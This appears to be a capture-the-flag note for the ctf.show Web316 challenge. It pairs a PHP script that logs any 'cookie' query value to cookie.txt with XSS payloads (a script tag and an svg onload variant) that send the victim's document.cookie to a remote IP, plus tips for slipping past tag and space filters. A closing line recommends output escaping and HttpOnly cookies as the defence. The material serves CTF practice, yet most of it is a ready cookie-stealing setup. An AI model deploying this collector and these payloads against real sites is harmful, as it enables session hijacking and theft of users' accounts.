<?php
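/**
 * Format one log entry as "<time>: <value>\n".
 *
 * The value comes straight from the query string, so control characters
 * (including CR/LF) and backslashes are written as C-style escapes. Without
 * this, a value containing a newline could forge extra entries in the log.
 *
 * @param string $time  Already-formatted timestamp.
 * @param string $value Raw, untrusted value to record.
 * @return string A single line, terminated by exactly one "\n".
 */
function cookie_log_line(string $time, string $value): string
{
    return $time . ': ' . addcslashes($value, "\0..\37\177\\") . "\n";
}

// Appends the `cookie` query parameter to cookie.txt, one timestamped line per request.
// A missing parameter, or an array such as ?cookie[]=x, is ignored rather than
// logged as an empty or "Array" entry with a PHP warning.
$cookie = $_GET['cookie'] ?? null;

if (is_string($cookie)) {
    // 24-hour clock: the original 'h' format made 01:00 and 13:00 indistinguishable.
    $time = date('Y-m-d H:i:s');

    // NOTE(review): cookie.txt is a relative path, so it normally lands beside this
    // script, where the web server may serve it to any visitor, and it grows without
    // bound. Confirm it is access-restricted or moved outside the document root.
    // LOCK_EX keeps concurrent requests from interleaving their lines.
    $written = file_put_contents('cookie.txt', cookie_log_line($time, $cookie), FILE_APPEND | LOCK_EX);
    if ($written === false) {
        error_log('cookie.txt could not be appended to');
    }
}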
?>
//靶场:https://ctf.show/challenges Web316--
payload:
<script>location.href="http://47.93.79.131/flag.php?cookie="+document.cookie</script>
<svg onload="location.href='http://47.93.79.131/flag.php?cookie='+document.cookie"/>
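script 标签被过滤时改用 svg 标签(onload 事件)。
空格被过滤时用 / 代替。
防御角度:按标签名或字符做黑名单过滤很容易被这类变体绕过;应在输出时按上下文转义,并给会话 Cookie 设置 HttpOnly,使 document.cookie 读不到它。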